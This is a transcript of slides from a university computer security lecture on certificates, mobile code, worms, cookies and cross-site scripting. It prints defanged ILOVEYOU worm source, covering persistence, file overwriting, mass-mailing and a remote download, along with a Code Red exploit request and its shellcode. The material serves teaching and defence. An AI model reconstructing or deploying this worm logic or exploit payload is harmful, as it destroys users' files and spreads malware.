20771: Computer Security Lecture 5: ATTACK WEEK - PowerPoint PPT Presentation

1 / 41
About This Presentation
Title:

20771: Computer Security Lecture 5: ATTACK WEEK

Description:

Lecture 5, 20-771: Computer Security, Fall 2001. 1. 20-771: Computer Security ... jcpenny.com TRUE / FALSE 60516333438 SITESERVER ID=69bcf8f963456b19fffdf1ff19f. ... – PowerPoint PPT presentation

Number of Views:190
Avg rating:3.0/5.0
Slides: 42
Provided by: robertth
Category:

less

Transcript and Presenter's Notes

Title: 20771: Computer Security Lecture 5: ATTACK WEEK


1
20-771 Computer SecurityLecture 5 ATTACK WEEK
  • Robert Thibadeau
  • School of Computer Science
  • Carnegie Mellon University
  • Institute for eCommerce, Fall 2000

2
Todays lecture
  • Mobile Code
  • Break (10 min)
  • Cookies
  • Cross Machine Scripting

3
This Week
  • Chapters 6,7 WS
  • More on Linux

4
http//xiotech.ulib.org/class
5
X.509v3
  • Need a public key to open it I.e., you can
    authenticate the source
  • Contains encrypted information that the source
    can communicate to you in privacy and with
    authority.
  • Authenticated, private, tamperproof,
    authorization
  • Can be employed as the basis for PKI chaining
    authority
  • Pass something up the chain for approval
    (signing) to provide the absolute authority
  • I.e., the Presidents office confirms such and
    such directive.

6
X.509v3 Certificate
  • -----BEGIN CERTIFICATE-----
  • MIIDNjCCApgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMA
    kGA1UEBhMCWFkx
  • FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2
    UgVG93bjEXMBUG
  • A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZm
    ljYXRlIEF1dGhv
  • cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhv
    cNAQkBFg9jYUBz
  • bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMT
    gyMTUxWjCBpzEL
  • MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMB
    EGA1UEBxMKU25h
  • a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBg
    NVBAsTDldlYnNl
  • cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR
    8wHQYJKoZIhvcN
  • AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQ
    UAA4GNADCBiQKB
  • gQC554RoVH0dJONqljPBWC72MDNGNy9eXnzejXrczsHs3Pc9
    2Vaat6CpIEEGue
  • yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9
    ziYon8jWsbK2aE
  • L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImWZds8YEFiAwIDAQ
    ABo24wbDAbBgNV
  • HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGGEIBDQ
    QtFittb2Rfc3Ns
  • IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMB
    EGCWCGSAGGEIB
  • AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nT
    kRDQlBdgCcnhy3
  • hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafL
    UMdARVV6BpIGMI
  • 5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJm
    jSguYCRt91sU4K
  • s0dfWsdItkw4uQ

7
X.509v3 Opened!
  • Certificate
  • Data
  • Version 3 (0x2)
  • Serial Number 1 (0x1)
  • Signature Algorithm md5WithRSAEncryption
  • Issuer CXY, STSnake Desert, LSnake
    Town, OSnake Oil, Ltd, OUCertificate Authority,
    CNSnake Oil CA/Emailca_at_snakeoil.dom
  • Validity
  • Not Before Oct 21 182151 1999 GMT
  • Not After Oct 20 182151 2001 GMT
  • Subject CXY, STSnake Desert, LSnake
    Town, OSnake Oil, Ltd, OUWebserver Team,
    CNwww.snakeoil.dom/Emailwww_at_snakeoil.dom
  • Subject Public Key Info
  • Public Key Algorithm rsaEncryption
  • RSA Public Key (1024 bit)
  • Modulus (1024 bit)

8
509 Opened 2
  • KEY 00b9e78468f951f474938daa58cf05
    6f82ef6303346372f5e5e7
    cde8d7ad
    ccec1ecdcf73dd9569ab7a0a920410
    6b9ec86dbdc5a81bd68ec68f
    629182 9558726771ead1
    ddd899055b905c15
    57d65cbe363d5e2b7fdce26289fc8d
    6b1b2b6684f8bea10ad71bc5
    d6c738 665d4885992707
    3fd55b3bd12ffb22
    65be65db3c60416203 Exponent 65537
    (0x10001)
  • X509v3 extensions
  • X509v3 Subject Alternative Name
  • emailwww_at_snakeoil.dom
  • Netscape Comment
  • mod_ssl generated custom server
    certificate
  • Netscape Cert Type
  • SSL Server
  • Signature Algorithm md5WithRSAEncryption
    7a311b181935d4479dff9d39110d0941
    7600 9c9e1cb7844adf98f365fcea
    f98d63a6bae7 de217a82bcce9d2b
    b916fca05ba2e8b8a5f7
    c829455a7cb50c74045557a069206308e4
    b9 9514adec830b89d35bfff74842
    b789135a84 fc6076c12ed421ecfc
    d6809a01018ecc2668
    d282e60246df75b14e0ab3475f5ac748b6
    4c 38b9
  •  

9
Active ContentAlso called Mobile Code
  • Web Browsers can download and execute software
    automatically without warning.
  • Software may damage users system or violate
    privacy.
  • Administrator This can tunnel through firewall
    protections.
  • Case U.S. Government came close, within two
    weeks, to an executive order that shut down all
    mobile code in the government.
  • Failed This would dumb down Federal employees
    and make the Government Stupid.

10
Threats from Mobile Code
  • Purposefully malicious
  • Moldovan Connection
  • Sexygirls.com and Erotic2000.com
  • Downloaded and ran viewer, program hung up phone
    and made long distance call to Moldovan, 2 per
    minute.
  • User taken to site stayed around without knowing
    charge.
  • I Love You Worm probable accidental escape.
  • Big programs have bugs
  • Other people will exploit those bugs

11
Traditional Threats
  • Trojan Horses Very Serious. Often used for
    spying. (e.g., change the login program to create
    a back door).
  • Virus Code that replicates itself and inserts
    into an executable program or file.
  • Macro viruses Viruses written in the macro
    language of a word processor, or other trusted
    program. Becomes infectious on other documents.
  • Rabbits Programs that make many copies of
    themselves. Standalone. Denial of Service.
  • Worms Similar but spread across network.

12
Many Many Threats
  • I Love You
  • Opening email that says I Love You from a
    person you know Trojan Horse
  • Reads your address book Privacy Violation
  • Deletes image files Havoc
  • Across Network Worm
  • Demonstrated
  • Microsoft Outlook could execute seriously
    destructive and intrusive active content without
    control of user.

13
Silent Information Thieves!
  • Access Log - My NeXT Machine in my office (BSD
    4.2) (/private/adm/network)
  • May 9 032305 nageela ftpd2184 refused
    connect from 209.233.224.173
  • May 9 052148 nageela ftpd2203
    gethostbyname(adsl-209-233-224-173.pacbell.net)
    lookup failure
  • May 9 052148 nageela ftpd2203 refused
    connect from 209.233.224.173
  • May 10 063251 nageela ftpd2509 connect from
    vc3-49d.dsl.indra.com
  • May 10 065045 nageela ftpd2512 connect from
    vc3-49d.dsl.indra.com
  • May 10 065046 nageela ftpd2513 connect from
    vc3-49d.dsl.indra.com
  • May 13 071142 nageela ftpd4267 connect from
    bilbo.ee.ualberta.ca
  • May 16 194624 nageela telnetd5775 connect
    from 209.208.174.4
  • May 16 194624 nageela ftpd5776 connect from
    209.208.174.4
  • May 16 194624 nageela ftpd5774 connect from
    209.208.174.4
  • May 16 194624 nageela telnetd5777 connect
    from 209.208.174.4
  • May 21 030653 nageela telnetd8119 connect
    from hermes.globalwebdesign.com
  • May 21 030654 nageela telnetd8120 connect
    from hermes.globalwebdesign.com
  • May 21 030654 nageela ftpd8121 connect from
    hermes.globalwebdesign.com
  • May 23 070629 nageela telnetd9035 connect
    from spaceace.vi.ri.cmu.edu
  • May 24 015535 nageela ftpd9277 connect from
    208.135.135.76
  • May 28 050238 nageela ftpd11282 connect from
    cx884963-a.chnd1.az.home.com
  • May 29 021638 nageela ftpd11749 connect from
    194.204.246.130

14
(No Transcript)
15
Economic CostsComputer Economics 8-01
  • Love Bug 8.7 Billion
  • Melissa 1.2 Billion
  • Code Red 2.6 Billion
  • 250,000 systems in just nine hours on July 19
  • 150,000 in 24 on Aug 1 After Warnings
  • Repair costs and loss of productivity and unknown
    cost of asset loss

16
I Love You Code(virus has been killed) had name
vxryfunny.vbs
  • rxm barok -lovxlxttxr(vbx)
  • rxm by spydxr / ispydxr_at_mail.com /
    _at_GRAMMxRSoft Group / Manila,Philippinxs
  • dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow
  • Sxt fso CrxatxObj("Scripting.FilxSystxmObj")
  • sxt filx fso.OpxnTxxt(WScript.ScriptFullnamx,1)
  • vbscopyfilx.RxadAll

17
I Love You Code 2
  • main()
  • sxt wscrCrxatxObj("WScript.Shxll")
  • rrwscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Micros
    oft\Windows Scripting Host\Sxttings\Timxout")
  • wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsof
    t\Windows Scripting Host\Sxttings\Timxout",0,"RxG_
    DWORD"
  • Sxt dirwin fso.GxtSpxcialFoldxr(0)
  • Sxt dirsystxm fso.GxtSpxcialFoldxr(1)
  • Sxt dirtxmp fso.GxtSpxcialFoldxr(2)
  • Sxt c fso.GxtFilx(WScript.ScriptFullNamx)
  • c.Copy(dirsystxm"\MSKxrnxl32.vbs")
  • c.Copy(dirwin"\Win32DLL.vbs")
  • c.Copy(dirsystxm"\Vxry Funny.vbs")
  • rxgruns()
  • html()
  • sprxadtoxmail()
  • listadriv()

18
I Love You Code 3 rxgruns()
  • sub rxgruns()
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm"\
    MSKxrnxl32.vbs"
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin
    "\Win32DLL.vbs"
  • Dnrxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
    txrnxt xxplorxr\Download Dirory")
  • rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt
    xxplorxr\Main\Start Pagx","http//www.skyinxt.nxt/
    young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw658
    7345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
  • rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
    indows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad"\
    WIN-BUGSFIX.xxx"
  • rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
    txrnxt xxplorxr\Main\Start Pagx","aboutblank"
  • xnd sub

19
I Love You Code 4Listing the Drives on Your
Machine(there were several of these utility-type
spies)
  • sub listadriv
  • Dim d,dc,s
  • Sxt dc fso.Drivxs
  • For xach d in dc
  • If d.DrivxTypx 2 or d.DrivxTypx3 Thxn
  • foldxrlist(d.path"\")
  • xnd if
  • Nxxt
  • listadriv s
  • xnd sub

20
I Love You Code 5re-writing jpg files
  • sub inffilxs(foldxrspxc)
  • sxt f fso.GxtFoldxr(foldxrspxc)
  • sxt fc f.Filxs
  • for xach f1 in fc
  • xxtfso.GxtxxtxnsionNamx(f1.path)
  • if (xxt"vbs") or (xxt"vbx") thxn
  • sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
  • ap.writx vbscopy
  • ap.closx
  • xlsxif(xxt"jpg") or (xxt"jpxg") thxn
  • sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
  • ap.writx vbscopy
  • ap.closx (did same for mp3 files and others)

21
if (xqfoldxrspxc) thxnif (s"mirc32.xxx") or
(s"mlink32.xxx") or (s"mirc.ini") or
(s"script.ini") or (s"mirc.hlp") thxnsxt
scriptinifso.CrxatxTxxtFilx(foldxrspxc"\script.i
ni")scriptini.WritxLinx "script"scriptini.Writ
xLinx "mIRC Script"scriptini.WritxLinx "
Plxasx dont xdit this script... mIRC will
corrupt, if mIRC will"scriptini.WritxLinx "
corrupt... WINDOWS will aff and will not run
corrly. thanks"scriptini.WritxLinx
""scriptini.WritxLinx "Khalxd
Mardam-Bxy"scriptini.WritxLinx
"http//www.mirc.com"scriptini.WritxLinx
""scriptini.WritxLinx "n0on 1JOIN"scripti
ni.WritxLinx "n1 /if ( nick mx ) halt
"scriptini.WritxLinx "n2 /.dcc sxnd nick
"dirsystxm"\Vxry Funny.HTM"scriptini.WritxLinx
"n3"scriptini.closxxqfoldxrspxcnxxt xnd
sub
I Love You Code 6 .ini
22
if (xqfoldxrspxc) thxnif (s"mirc32.xxx") or
(s"mlink32.xxx") or (s"mirc.ini") or
(s"script.ini") or (s"mirc.hlp") thxnsxt
scriptinifso.CrxatxTxxtFilx(foldxrspxc"\script.i
ni")scriptini.WritxLinx "script"scriptini.Writ
xLinx "mIRC Script"scriptini.WritxLinx "
Plxasx dont xdit this script... mIRC will
corrupt, if mIRC will"scriptini.WritxLinx "
corrupt... WINDOWS will aff and will not run
corrly. thanks"scriptini.WritxLinx
""scriptini.WritxLinx "Khalxd
Mardam-Bxy"scriptini.WritxLinx
"http//www.mirc.com"scriptini.WritxLinx
""scriptini.WritxLinx "n0on 1JOIN"scripti
ni.WritxLinx "n1 /if ( nick mx ) halt
"scriptini.WritxLinx "n2 /.dcc sxnd nick
"dirsystxm"\Vxry Funny.HTM"scriptini.WritxLinx
"n3"scriptini.closxxqfoldxrspxcnxxt xnd
sub
I Love You Code 7 .ini file
23
sub sprxadtoxmail()sxt rxgxditCrxatxObj("WScript
.Shxll")sxt outWScript.CrxatxObj("Outlook.Applic
ation")sxt mapiout.GxtNamxSpacx("MAPI")for
ctrlists1 to mapi.AddrxssLists.Countsxt
amapi.AddrxssLists(ctrlists)rxgvrxgxdit.RxgRxad
("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"a)if
(int(a.Addrxssxntrixs.Count)int(rxgv)) thxnfor
ctrxntrixs1 to a.Addrxssxntrixs.Countmalxada.Ad
drxssxntrixs(x)rxgad""rxgadrxgxdit.RxgRxad("HK
xY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"malxad)i
f (rxgad"") thxnsxt malxout.CrxatxItxm(0)malx.
Rxcipixnts.Add(malxad)malx.Subj "fwd
Jokx"malx.Body vbcrlf""malx.Attachmxnts.Add(d
irsystxm"\Vxry Funny.vbs")malx.SxndSxt
outNothingSxt mapiNothingxnd sub
I Love You Code 8 spread mail
24
Silent Attacks
  • I should be obvious it would not be hard to
    create a silent worm that sends mail on file
    systems, files, and address lists (and also all
    your mail on your local machine).
  • We can do this with your web browser too
  • Code Red is only ONE example

25
Virus Checkers
  • Pattern match in secret ways to find viral
    fingerprints
  • Use a technique called finite state automata to
    create very fast search over your files.
  • If virus is not known already, it will do damage.
  • Finding silent viruses may be hard.

26
Break!
27
Authenticode System
  • Windows 2000
  • Running code requires a X.509v3 Certificate with
    an approved CA
  • Personal Publishers (ID with Credit Bureau)
  • Commercial Publishers (Articles of Incorporation)
  • Sign a pledge reasonable care consistent with
    prevailing industry standards to keep code free
    from viruses, malicious code, and other dta that
    may damage, misappropriate, or otherwise
    interfere with a third partys operations.
  • Remedy Revoke your Certificate (HA!)

28
Steps you can Take
  • Dont run as administrator/root
  • Use Virus Checkers (but watch those companies!!!)
  • Backup Often
  • Verify the integrity and authenticity of
    software.
  • A very good idea is to not accept active code
    without a certificate that guarantees the author
    can be found!
  • Same principle as mutually assured destruction
    or keep the pilot on the plane! He wont hurt
    you if you can hurt him.

29
Finally,
  • Even if Adobe is the authentic code
    writer/distributor, get them to agree to your
    privacy!

30
Record of URLs youve visited
  • Browser History file, document cache, and cookies
  • Unix spools or /var/adm / Windows /winnt,
    /windows, program files/netscape etc.
  • Mobile code can read these.
  • Organizations firewall or proxy server (most have
    logging capability)
  • ISPs firewall, router, or proxy server.
  • Each of the remote servers youve visited.

31
Web Server
  • Standard Logs
  • HTTP header information
  • Date, From, URI, Referrer, Response Status to
    Request
  • Also from HTTPS! (The Server Knows!)
  • Logs are essential to security
  • Fancier Logs
  • HTTP
  • Whats in the forms
  • Whats in the responses
  • Really fancy
  • Dynamically changing information based on where
    youve been.
  • Tracking across web servers.

32
Code Red Log
  • 12.27.8.161 - - 09/Sep/2001040707 -0400 "GET
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXu9090u6858
    ucbd3u7801u9090u6858ucbd3u7801u9090u6858uc
    bd3u7801u9090u9090u8190u00c3u0003u8b00u531
    bu53ffu0078u0000u00a HTTP/1.0" 404 278

33
Code Red I and IIhttp//www.eeye.com/html/Researc
h/Advisories/AL20010804.html
  • U9090
  • u6858
  • ucbd3
  • u7801
  • u9090
  • u6858
  • ucbd3
  • u7801
  • u9090
  • u6858
  • ucbd3
  • u7801
  • u9090
  • u9090
  • u8190
  • u00c3
  • u0003
  • u8b00
  • u531b
  • u9090
  • u6858
  • ucbd3
  • u7801
  • u9090
  • u6858
  • ucbd3
  • u7801
  • u9090
  • u6858
  • ucbd3
  • u7801
  • u9090
  • u9090
  • u8190
  • u00c3
  • u0003
  • u8b00
  • u531b

34
Cookies (netscape cookie file)
  • URL-Invoking-It domain? Path in Server
    https? Expiration Name value
  • www.airtime.co.uk FALSE /users/wysywig/
    FALSE 968081837 username aaa
  • www.kbb.com FALSE /kb/ki.dll FALSE
    9519638334 zipcode 15638
  • www.jcpenney.com FALSE /jcp FALSE
    126632340 ShopperManager6Fjcp
    SHOPPERMANAGER6FJCP6EJSN34316NP100L1RURQ8HHF8MX3
    4
  • www.buy.com FALSE /bc FALSE 128333061
    ShopperManager6F SHOPPERMANAGER6FVQ8VSKLC
    WHSN000CM9C9JS7EDVL1
  • .doubleclick.net TRUE / FALSE
    196034991340 id 39609560
  • .lycos.com TRUE / FALSE 161735952
    CyberTargetAnonymous LYC000AFBAE77275BF6D2734BF
    CF563A16
  • .cmgi.com TRUE / FALSE 16173595634
    CyberGlobalAnonymous CTG00017D567763405BF1FB34
    F8BFCD8B1D33
  • .webcrawler.com TRUE / FALSE
    9342341600 registered no
  • .webcrawler.com TRUE / FALSE
    9342341600 UID 210076B35C89A5C
  • .microsoft.com TRUE / FALSE
    1065303482 MC1 GUIDDF160779710D118B1808006B
    B734F3F
  • .washingtonpost.com TRUE / FALSE
    9342951343 RMID 98c81c8d3606d690
  • www.americanbible.org FALSE / FALSE
    16308113498 Int 343 346 38 3 343 38 30 3
    334 68 5 3
  • www.americanbible.org FALSE / FALSE
    1630811600 User Profile F633C7686DA1FDBE8588
    0034CDB11

35
Cookies (netscape cookie file)
  • URL-Invoking-It domain? Path in Server
    https? Expiration Name value
  • www.antiquebooks.net FALSE / FALSE
    938368777 ulantique 7-1-6-win-ns
  • classics.mit.edu FALSE / FALSE
    934285095 ICA_last_work Homer.iliad
  • .jcpenny.com TRUE / FALSE 60516333438
    SITESERVER ID69bcf8f963456b19fffdf1ff19f
  • .amazon.com TRUE / FALSE 6086797993
    ubid-main 06-6073435981034
  • nonprofit.guidestar.org FALSE / FALSE
    613723673 CFID 95690
  • .google.com TRUE / FALSE
    6134736834347 ID 34816dff31190ff80
  • .cmu.edu TRUE / FALSE 6051263400
    SITESERVER IDf8185834df6bac5f80a793a534c18
  • .waterhouse.com TRUE / FALSE
    963585098 accountno 35869873
  • tracking.carprices.com FALSE / FALSE
    9634234581 PARTNER CARPRICES
  • tracking.carprices.com FALSE / FALSE
    9634234581 MEMB_ID -1
  • tracking.carprices.com FALSE / FALSE
    9634234581 USER 10.8.1.35-1
  • tracking.carprices.com FALSE / FALSE
    9634234578 RETURN VISITOR

36
Cookies Server Writes to Browser
  • Set-Cookie NAMEVALUE expiresDATE pathPATH
    domainDOMAIN_NAME secure
  • NAMEVALUE
  • expiresDATE
  • domainDOMAIN_NAME
  • The default value of domain is the host name of
    the server which generated the cookie response.
  • pathPATH
  • The path attribute is used to specify the subset
    of URLs in a domain for which the cookie is
    valid.
  • secure
  • If a cookie is marked secure, it will only be
    transmitted if the communications channel with
    the host is a secure one. Currently this means
    that secure cookies will only be sent to HTTPS
    (HTTP over SSL) servers. If secure is not
    specified, a cookie is considered safe to be sent
    in the clear over unsecured channels.

37
Browser Volunteers Cookie to Server!
  • If Browser visits the URL again, it volunteers
    cookie name and contents to the URL
  • Cookie NAME1OPAQUE_STRING1 NAME2OPAQUE_STRING2
    ...
  • Server Database can contain
  • Cookie Name
  • Opaque String
  • Who (what IP/Host/User/etc) reported it
  • When

38
Cookie Source Codewww.mozilla.org
  • host \t isDomain \t path \t xxx \t expires \t
    name \t cookie from http//lxr.mozilla.org/seamonk
    ey/source/extensions/cookie/nsCookie.cpp2078
  • JavaScript Interface! Red - read only
  • Name Type
    Description
  • path string
    path the cookie applies to
  • domain string
    domain the cookie applies to
  • name string
    name of the cookie
  • value string
    value of the cookie
  • expires string
    date the cookie expires
  • url string
    url setting the cookie TROJAN HORSE
    OPPORTUNITY!
  • isSecure boolean
    the cookie is sent over secure connections only
  • isDomain boolean
    the cookie has a domain attribute
  • prompt boolean
    user has configured prefs to throw cookie
    confirm dialog
  • preference int
    the user's cookie acceptance value
  • accept() method
    allows the cookie to be set
  • reject() method
    causes the cookie not to be set
  • ask() method
    prompt a netlib confirmation dialog
  • (happens during netlib
    set cookie execution)

39
Cookies - Notes
  • Multiple Set-Cookie headers in single server
    response.
  • Same path but different names will add additional
    mappings.
  • Higher-level path value not override specific
    path mappings.
  • Expires header lets client purge the mapping but
    not required.
  • Number of cookies that a client can store at any
    one time.
  • 300 total cookies
  • 4 kilobytes per cookie
  • 20 cookies per server domain.
  • CGI script deletes a cookie by returning same
    cookie expired time.
  • This requirement makes it difficult for anyone
    but the originator of a cookie to delete a
    cookie.
  • Set-cookie response header should never be
    cached.
  • If proxy server receives response containing
    Set-cookie, it should propagate the Set-cookie
    header to the client, regardless of whether the
    response was 304 (Not Modified) or 200 (OK).
  • Similarly, if a client request contains a Cookie
    header, it should be forwarded through a proxy,
    even if the conditional If-modified-since request
    is being made.

40
Two Sides
  • Buyer wants things without exposing any
    information he discloses to any use other than
    what they MUST have to give him the things he
    wants. (Cryptophilia)
  • Seller wants to know as much about Buyer as
    possible because this gives him control over
    Buyers and therefore revenue. He can also sell
    this information (e.g., to advertisers). He wants
    unrestricted use of this information.
  • BUT, Buyers now collect information on Sellers
    and misuse that (The Sky is Falling.)
  • An Agreement is bilateral. The Internet can make
    possible agreements public and thereby expose
    both Sellers and Buyers to violations.

41
Cross Site Scripting
  • Same as cross machine cookies
  • Fill in a form with a script (
  • Web Server returns blindly printing script
  • Filter these characters out
  • " ' ) ( -
  • But, What about the situation where you want
    somebody to click you and know where they clicked
    from (double click).
Write a Comment
User Comments (0)
About PowerShow.com